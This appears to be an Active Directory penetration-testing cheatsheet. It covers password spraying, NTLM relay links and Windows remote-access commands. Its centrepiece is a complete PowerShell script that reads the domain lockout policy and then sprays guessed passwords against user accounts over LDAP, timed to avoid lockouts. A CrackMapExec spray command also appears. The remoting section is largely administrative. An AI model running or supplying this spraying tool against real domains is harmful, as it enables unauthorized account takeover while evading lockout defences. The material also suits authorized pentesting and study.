Unauthenticated Vectors:
Password Spraying:
- https://book.hacktricks.xyz/windows/active-directory-methodology/password-spraying
- https://github.com/Greenwolf/Spray
- MSF: use auxiliary/scanner/smb/smb_login
- CrackMapExec: crackmapexec smb <targetfile> -u <userfile> -p <password> -d <domain> --continue-on-success
- Before spraying, read the domain lockout policy (lockoutThreshold, lockOutObservationWindow): one password across all users per observation window, never several passwords against one user.
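The tools above do the spraying; what they do not do for you is check the lockout policy first. The script below is an added example, not code from the cheatsheet or from any of the linked projects: it reads lockoutThreshold and lockOutObservationWindow from the domain object over LDAP, refuses to run when one bad guess would lock an account, sprays a single password across all users, and then waits out the observation window before the next password. The domain name, user names and passwords are placeholders, and it assumes the host can reach a domain controller on LDAP/389 and read the domain object with its current identity.

```powershell
# Added example, not from the original cheatsheet: a lockout-aware LDAP-bind spray.
# Assumptions: a DC for $Domain is reachable over LDAP/389 and the domain object is
# readable with the current identity; 'corp.local', the users and the passwords
# are placeholders.
param(
    [string]   $Domain    = 'corp.local',
    [string[]] $Users     = @('alice', 'bob', 'carol'),
    [string[]] $Passwords = @('Spring2024!', 'Summer2024!')
)

Add-Type -AssemblyName System.DirectoryServices

# 1. Read the lockout policy from the domain object before sending a single guess.
#    DirectorySearcher hands back the large-integer window as Int64 (negative 100ns ticks).
$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$Domain")
$searcher.Filter      = '(objectClass=domainDNS)'
$searcher.SearchScope = 'Base'
$null = $searcher.PropertiesToLoad.AddRange([string[]]@('lockoutThreshold', 'lockOutObservationWindow'))
$pol       = $searcher.FindOne().Properties
$threshold = [int]$pol['lockoutthreshold'][0]
$windowMin = [math]::Abs([int64]$pol['lockoutobservationwindow'][0]) / 600000000
Write-Host "lockoutThreshold=$threshold (0 = never locks)  observationWindow=$windowMin min"

# 2. Refuse when a single failed bind would lock the account.
if ($threshold -eq 1) { throw 'lockoutThreshold is 1: any failed bind locks the account' }

function Test-LdapBind {
    param([string]$User, [string]$Pass)
    # Simple bind with the supplied credentials; a failure raises badPwdCount just like SMB.
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Domain", "$Domain\$User", $Pass)
    try {
        $null = $entry.NativeObject      # forces the bind; throws on failure
        return $true
    } catch {
        # Anything other than a plain bad password (locked out, expired, disabled) is
        # worth seeing: the account is in a state we should leave alone.
        if ($_.Exception.Message -notmatch 'user ?name or password is incorrect') {
            Write-Warning "$User : $($_.Exception.Message.Trim())"
        }
        return $false
    } finally {
        $entry.Dispose()
    }
}

# 3. One password across every user, then wait out the observation window so each
#    user's badPwdCount resets before the next password.
for ($i = 0; $i -lt $Passwords.Count; $i++) {
    $pw = $Passwords[$i]
    foreach ($u in $Users) {
        if (Test-LdapBind -User $u -Pass $pw) {
            Write-Host "[+] $Domain\$u : $pw" -ForegroundColor Green
        }
    }
    if ($threshold -gt 0 -and $i -lt $Passwords.Count - 1) {
        Write-Host "Sleeping $windowMin min before the next password"
        Start-Sleep -Seconds ([int]($windowMin * 60))
    }
}
```

The policy read uses DirectorySearcher rather than a raw [ADSI] property because the searcher converts the IADsLargeInteger window to Int64 for you. Fine-grained password policies (PSOs) can override the domain values for specific users, so a domain with PSOs needs a per-user check on msDS-ResultantPSO before trusting these numbers.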
Relaying Credentials with ntlmrelayx:
- https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
Authenticated Vectors:
Start CMD with secondary user credentials:
- Local account: runas /user:<username> cmd.exe (password is validated locally)
- Domain account, network use only: runas /netonly /user:<domain>\<username> cmd.exe
- /netonly does not validate the password locally and whoami still shows the original user; the credentials are used only for outbound connections, so it works from a non-domain-joined host and a wrong password only shows up on the first network access.
Log into System:
- winrs -r:<computername> cmd.exe
- Enter-PSSession -ComputerName <computername>
Enable PowerShell Remoting
- Enable: Enable-PSRemoting -Force
- Check WinRM Running: Get-Service WinRM (or Get-WmiObject -Class win32_service | Where-Object {$_.Name -eq "WinRM"})
- Set all remote hosts to trusted: Set-Item WSMan:\localhost\Client\TrustedHosts -Value * (weak: with NTLM the client will send credentials to any host that answers to the name, so a spoofed DNS or LLMNR answer captures them; list specific hosts instead. TrustedHosts is not consulted at all when Kerberos is used.)
- Verify Configuration: Get-Item WSMan:\localhost\Client\TrustedHosts
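The steps above as one script, added here as an example rather than taken from the cheatsheet: it enables remoting, checks the service, shows the wildcard TrustedHosts setting commented out beside a host-scoped one, and then opens a session with explicit credentials. It assumes an elevated PowerShell prompt on the client, and 'jump01.corp.local' is a placeholder host name.

```powershell
# Added example, not from the original cheatsheet. Assumes an elevated prompt on the
# client; 'jump01.corp.local' is a placeholder target.

# 1. Enable remoting: starts WinRM, creates the HTTP listener and firewall rule.
#    Add -SkipNetworkProfileCheck if the active network profile is Public.
Enable-PSRemoting -Force

# 2. Confirm the service is actually running before touching client config.
$svc = Get-Service -Name WinRM
if ($svc.Status -ne 'Running') { throw "WinRM is $($svc.Status), not Running" }

# 3. Weak setting from the cheatsheet, left commented out: trusting every host means
#    an NTLM client will hand its credentials to whatever answers for the name.
# Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force

# 4. Scoped setting: only the host we need, appended so existing entries survive.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 'jump01.corp.local' -Concatenate -Force

# 5. Verify what the client will now trust.
Get-Item WSMan:\localhost\Client\TrustedHosts

# 6. Connect with explicit credentials. On a domain-joined client using the FQDN,
#    Kerberos is negotiated and TrustedHosts is never consulted; the entry above only
#    matters for NTLM (workgroup host, IP address, or cross-forest name).
$cred = Get-Credential -Message 'Account for the remote session'
$session = New-PSSession -ComputerName 'jump01.corp.local' -Credential $cred
try {
    Invoke-Command -Session $session -ScriptBlock { whoami; hostname }
} finally {
    Remove-PSSession $session
}
```

For the winrs equivalent, winrs -r:jump01.corp.local -u:<domain>\<user> -p:<pass> cmd.exe goes through the same WinRM listener and the same TrustedHosts rules.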
Windows Activities:
See: https://danielkumar.com/index.php/2021/07/19/cheatsheet-microsoft-windows/